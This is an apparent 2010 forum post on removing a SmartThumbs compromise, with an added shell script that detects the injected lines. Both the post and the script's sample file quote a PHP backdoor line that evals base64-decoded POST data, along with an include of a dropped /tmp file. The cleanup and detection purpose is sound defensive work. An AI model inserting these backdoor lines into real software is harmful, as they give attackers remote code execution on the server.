Remove SmartThumbs exploit in 5 steps
Posted by MMagery on Saturday May 8, 2010
Many webmasters have recently (until the last update) noticed rogue sites opening after clicks on their TGPs and MGPs. The cause was an ST exploit and a vulnerability in ST that was fixed in the last update. However, you HAVE TO be sure that your ST is clean, so here is a quick tutorial. If you need help with cleaning, you can hire a system administrator from DLXER.com.
1. step - UPDATE your ST to the latest version!
2. step - open the st/admin/variables.php file and search for the strings @eval(base64_decode($_POST or $qall=1;@include_once. If you find them, your ST install is still infected. You have to remove these lines:
$qall=1;@include_once('/tmp/sesa.tmp');
@eval(base64_decode($_POST [qxp]));//';
3. step - remove the file /tmp/sesa.tmp (command: rm -f /tmp/sesa.tmp). For future protection you can set up a cron job that runs every 3 minutes and cleans all *.tmp files in the /tmp/ folder.
4. step - clean the MySQL database. First you have to find which MySQL database your ST install is using; the data is in st/classes/mysql.php. After that, use the phpMyAdmin tool and log in to your MySQL database. Find the table st_settings, then the column niche. You will notice the same exploit strings here. You have to remove them.
5. step - lock down your ST install: run the command php st/admin/lock.php
update: just got an update that /tmp/webcam.tmp could be the filename for the include statement too, so if you have anything like @include_once('/tmp/XXXXXX.tmp'); in your variables.php file, your ST is infected
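
The check from step 2, widened to the generic /tmp/XXXXXX.tmp include from the update note, can be scripted so it is repeatable after every cleanup. This is an added example, not part of the original post or of SmartThumbs; the function names are hypothetical and the sample files are constructed.

```shell
#!/bin/sh
# Added example: scan a SmartThumbs variables.php for the injected lines
# named in step 2 and in the update note. Function names are hypothetical.

# Print matching lines with line numbers; exit status 0 means "infected".
st_find_injected() {
    grep -nE -e '@eval\(base64_decode\(\$_POST' \
             -e '\$qall=1;@include_once' \
             -e '@include_once\(./tmp/[^)]+\.tmp' "$1"
}

# Print each /tmp/*.tmp path pulled in by an injected include, one per line,
# so the dropped file can be inspected and removed (step 3).
st_included_tmp_files() {
    grep -oE '@include_once\(./tmp/[^)]+\.tmp' "$1" |
        sed -E 's/^@include_once\(.//' | sort -u
}

# Report on one file; returns 0 when clean, 1 when infected.
st_check() {
    if st_find_injected "$1" >/dev/null; then
        echo "INFECTED: $1"
        st_find_injected "$1"
        st_included_tmp_files "$1" | sed 's/^/  included file: /'
        return 1
    fi
    echo "clean: $1"
}

# Constructed sample input (not a real install): one infected, one clean file.
demo_dir=$(mktemp -d)
cat > "$demo_dir/infected.php" <<'EOF'
<?php
$niche = 'general';
$qall=1;@include_once('/tmp/sesa.tmp');
@eval(base64_decode($_POST [qxp]));//';
@include_once('/tmp/webcam.tmp');
EOF
printf '<?php\n$niche = %s;\n' "'general'" > "$demo_dir/clean.php"

st_check "$demo_dir/clean.php"
st_check "$demo_dir/infected.php" || true
rm -rf "$demo_dir"
```

On a real install, call st_check with the path to st/admin/variables.php; a non-zero exit status means the file still needs the cleanup from steps 2 and 3.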



